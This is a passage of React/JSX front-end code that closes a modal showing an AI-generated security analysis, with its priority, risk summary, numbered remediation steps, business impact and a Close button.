              <h4 className="font-semibold text-metallic-900">Priority</h4>
              <Badge variant={aiAnalysis.priority === 'critical' ? 'error' : aiAnalysis.priority === 'high' ? 'warning' : 'info'}>{aiAnalysis.priority}</Badge>
            </div>
            <div>
              <h4 className="font-semibold text-metallic-900 mb-2">Risk Summary</h4>
              <p className="text-sm text-metallic-600 leading-relaxed">{aiAnalysis.riskSummary}</p>
            </div>
            <div>
              <h4 className="font-semibold text-metallic-900 mb-2">Remediation Steps</h4>
              <ol className="space-y-2">
                {aiAnalysis.remediationSteps.map((step, i) => (
                  <li key={i} className="flex items-start gap-3 text-sm text-metallic-600">
                    <Badge variant="info" size="sm">{i + 1}</Badge>
                    <span>{step}</span>
                  </li>
                ))}
              </ol>
            </div>
            <div>
              <h4 className="font-semibold text-metallic-900 mb-2">Business Impact</h4>
              <p className="text-sm text-metallic-600 leading-relaxed">{aiAnalysis.businessImpact}</p>
            </div>
            <div className="flex justify-end pt-2">
              <Button variant="ghost" onClick={() => setAiModalOpen(false)}>Close</Button>
            </div>
          </div>
        ) : null}
      </Modal>
    </motion.div>
  )
}
